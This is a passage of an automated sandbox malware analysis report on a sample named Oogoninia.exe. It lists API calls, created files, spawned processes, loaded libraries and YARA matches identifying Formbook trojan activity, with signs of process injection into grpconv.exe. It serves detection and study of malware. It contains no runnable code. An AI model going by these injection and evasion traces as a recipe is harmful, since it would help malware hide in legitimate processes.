        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2E80 NtCreateProcessEx
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2EB0 NtProtectVirtualMemory
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2E00 NtQueueApcThread
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2FB0 NtSetValueKey
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2F30 NtOpenDirectoryObject
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA38D0 NtGetContextThread
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA29D0 NtWaitForSingleObject
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2AC0 NtEnumerateValueKey
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2AA0 NtQueryInformationFile
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2A10 NtWriteFile
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2BE0 NtQueryVirtualMemory
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2B20 NtQueryInformationProcess
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B2EFFE NtQueryInformationProcess
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B33568 NtSetContextThread
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B33EC8 NtQueueApcThread
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B33888 NtSuspendThread
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B33BA8 NtResumeThread
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\Oogoninia.exe | File created: C:\Windows\Fonts\prelegacy
        Source: C:\Users\user\Desktop\Oogoninia.exe | File created: C:\Windows\Fonts\prelegacy\prster
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_04125B494_2_04125B49
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CDD4809_2_04CDD480
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C704459_2_04C70445
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D275C69_2_04D275C6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2F5C99_2_04D2F5C9
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D3A5269_2_04D3A526
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CE36EC9_2_04CE36EC
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2F6F69_2_04D2F6F6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C6C6E09_2_04C6C6E0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D1D6469_2_04D1D646
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C946709_2_04C94670
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8C6009_2_04C8C600
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D0D62C9_2_04D0D62C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D267579_2_04D26757
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7A7609_2_04C7A760
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C6170C9_2_04C6170C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7B0D09_2_04C7B0D0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C600A09_2_04C600A0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D1E0769_2_04D1E076
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C751C09_2_04C751C0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8B1E09_2_04C8B1E0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CB717A9_2_04CB717A
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C5F1139_2_04C5F113
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D3010E9_2_04D3010E
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D0D1309_2_04D0D130
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C5D2EC9_2_04C5D2EC
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C322459_2_04C32245
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2124C9_2_04D2124C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8D2109_2_04C8D210
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C613809_2_04C61380
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7E3109_2_04C7E310
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2F3309_2_04D2F330
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C88CDF9_2_04C88CDF
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C78CE09_2_04C78CE0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8FCE09_2_04C8FCE0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D3ACEB9_2_04D3ACEB
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D09C989_2_04D09C98
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D1EC4C9_2_04D1EC4C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C73C609_2_04C73C60
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2EC609_2_04D2EC60
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D26C699_2_04D26C69
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C60C129_2_04C60C12
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7AC209_2_04C7AC20
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C79DD09_2_04C79DD0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D0FDF49_2_04D0FDF4
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C82DB09_2_04C82DB0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D27D4C9_2_04D27D4C
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C70D699_2_04C70D69
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C6AD009_2_04C6AD00
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D31D2E9_2_04D31D2E
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D29ED29_2_04D29ED2
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C62EE89_2_04C62EE8
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C71EB29_2_04C71EB2
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D20EAD9_2_04D20EAD
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CB2E489_2_04CB2E48
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C90E509_2_04C90E50
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D10E6D9_2_04D10E6D
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D21FC69_2_04D21FC6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2EFBF9_2_04D2EFBF
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2FF639_2_04D2FF63
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C7CF009_2_04C7CF00
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C728C09_2_04C728C0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D218DA9_2_04D218DA
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D278F39_2_04D278F3
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C868829_2_04C86882
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C758B09_2_04C758B0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CE98B29_2_04CE98B2
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C568689_2_04C56868
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C798709_2_04C79870
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8B8709_2_04C8B870
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C738009_2_04C73800
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C9E8109_2_04C9E810
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D108359_2_04D10835
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CB59C09_2_04CB59C0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C399E89_2_04C399E8
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C6E9A09_2_04C6E9A0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2E9A69_2_04D2E9A6
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2FA899_2_04D2FA89
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C8FAA09_2_04C8FAA0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2EA5B9_2_04D2EA5B
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04D2CA139_2_04D2CA13
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CE4BC09_2_04CE4BC0
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04CADB199_2_04CADB19
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04C70B109_2_04C70B10
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2EFFE9_2_04B2EFFE
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2E4449_2_04B2E444
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2E7DD9_2_04B2E7DD
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2D8489_2_04B2D848
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2CAE39_2_04B2CAE3
        Source: C:\Windows\SysWOW64\grpconv.exeCode function: 9_2_04B2E3249_2_04B2E324
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 04CB7BE4 appears 88 times
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 04CA5050 appears 36 times
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 04C5B910 appears 251 times
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 04CEEF10 appears 105 times
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 04CDE692 appears 84 times
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: String function: 32577BE4 appears 84 times
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: String function: 3251B910 appears 229 times
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: String function: 3259E692 appears 80 times
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: String function: 325AEF10 appears 89 times
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: String function: 32565050 appears 34 times
        Source: Oogoninia.exe | Static PE information: invalid certificate
        Source: Oogoninia.exe, 00000002.00000002.1365528846.00000000327C0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000003.1266200701.00000000322A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000002.1354974337.000000000225B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGRPCONV.EXEj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000003.1269709171.000000003246C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Oogoninia.exe
        Source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGRPCONV.EXEj% vs Oogoninia.exe
        Source: Oogoninia.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine | Classification label: mal96.troj.evad.winEXE@5/7@2/2
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_004043C3 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar
        Source: C:\Users\user\Desktop\Oogoninia.exe | File created: C:\Program Files (x86)\Fljtenists.ini
        Source: C:\Users\user\Desktop\Oogoninia.exe | File created: C:\Users\user\slavelivets
        Source: C:\Users\user\Desktop\Oogoninia.exe | File created: C:\Users\user\AppData\Local\Temp\nsqBBFA.tmp
        Source: Oogoninia.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Oogoninia.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\Oogoninia.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: Oogoninia.exe | ReversingLabs: Detection: 39%
        Source: C:\Users\user\Desktop\Oogoninia.exe | File read: C:\Users\user\Desktop\Oogoninia.exe
        Source: unknown | Process created: C:\Users\user\Desktop\Oogoninia.exe "C:\Users\user\Desktop\Oogoninia.exe"
        Source: C:\Users\user\Desktop\Oogoninia.exe | Process created: C:\Users\user\Desktop\Oogoninia.exe "C:\Users\user\Desktop\Oogoninia.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
        Source: C:\Users\user\Desktop\Oogoninia.exe | Process created: C:\Users\user\Desktop\Oogoninia.exe "C:\Users\user\Desktop\Oogoninia.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: wininet.dll
        Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
        Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
        Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
        Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
        Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
        Source: C:\Users\user\Desktop\Oogoninia.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\Oogoninia.exe | File written: C:\Program Files (x86)\Fljtenists.ini
        Source: Oogoninia.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: grpconv.pdb source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: grpconv.pdbGCTL source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: wntdll.pdbUGP source: Oogoninia.exe, 00000002.00000003.1266200701.0000000032185000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1269709171.000000003233F000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1352249094.00000000048C5000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1355628174.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Oogoninia.exe, Oogoninia.exe, 00000002.00000003.1266200701.0000000032185000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1269709171.000000003233F000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1352249094.00000000048C5000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1355628174.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmp

        Data Obfuscation

        Source: Yara match | File source: 00000000.00000002.1193487825.0000000002E02000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_324F21AD pushad ; retf 0004h 2_2_324F223F
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_324F97A1 push es; iretd 2_2_324F97A8
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325208CD push ecx; mov dword ptr [esp], ecx 2_2_325208D6
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0412D01C pushad ; retf 4_2_0412D022
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0412843F push edi; ret 4_2_04128440
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0412D029 pushad ; retf 4_2_0412D036
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0411FC43 push ds; ret 4_2_0411FC44
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0411D901 push 78CA8A45h; iretd 4_2_0411D906
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0411ED5F push edx; retf 4_2_0411ED60
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0412C9B7 push eax; ret 4_2_0412C9B9
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0411E32E push ecx; ret 4_2_0411E32F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_04120BD1 push esp; iretd 4_2_04120BD9
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C3E7CB push cs; retn 0009h 9_2_04C3E7A1
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C3E798 push cs; retn 0009h 9_2_04C3E7A1
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C397A1 push es; iretd 9_2_04C397A8
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C3E7A4 push esp; retn 0009h 9_2_04C3E7A9
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C3E7B8 push ss; ret 9_2_04C3E7C1
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C3E060 push eax; retf 0008h 9_2_04C3E06D
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C3E074 pushfd ; retf 9_2_04C3E075
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C321AD pushad ; retf 0004h 9_2_04C3223F
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C31210 push edx; ret 9_2_04C31216
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C3733B push eax; retf 0004h 9_2_04C3734E
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04C608CD push ecx; mov dword ptr [esp], ecx 9_2_04C608D6
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B30C1A push edi; ret 9_2_04B30C1B
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B2841E push ds; ret 9_2_04B2841F
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B2753A push edx; retf 9_2_04B2753B
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B30624 pushad ; iretd 9_2_04B3062C
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04B260DC push 78CA8A45h; iretd 9_2_04B260E1
